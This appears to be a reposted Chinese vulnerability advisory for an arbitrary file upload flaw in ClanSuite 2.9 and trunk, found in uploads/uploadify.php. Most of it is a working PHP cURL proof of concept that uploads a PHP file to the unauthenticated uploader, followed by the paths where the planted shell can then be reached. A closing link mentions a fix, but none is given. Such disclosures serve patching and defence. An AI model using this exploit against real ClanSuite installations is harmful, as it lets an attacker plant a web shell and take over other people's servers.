标题: ClanSuite 2.9 Arbitrary File Upload 发现者: Adrien Thierry 程序开发商http://clansuite.com/ 下载 地址 : https://github.com/jakoch/Clansuite http://svn.gna.org/svn/clansuite/trunk/ 影响版本: 2.9 and Trunk Revision 6400 缺陷地址 : uploads/uploadify.php 测试方法 <?php $u="C:\Program Files (x86)\Easy PHP -5.3.9\www\info.php"; $c = curl_init("http:// www.2cto.com /uploads/uploadify.php"); // Version 2.9 $c = curl_init("http:// www.2cto.com /application/uploads/uploadify.php"); // Version trunk curl_setopt($c, CURLOPT_POST, true); curl_setopt($c, CURLOPT_POSTFIELDS, array('Filedata'=>"@$u", 'name'=>"info.php")); curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); $e = curl_exec($c); curl_close($c); echo $e; ?> shell位置: http://www.2cto.com /uploads/temps/info.php 或者 http://www.2cto.com /application/uploads/temps/info.php
查看更多关于ClanSuite 2.9任意文件上传漏洞及修复 - 网站安全的详细内容...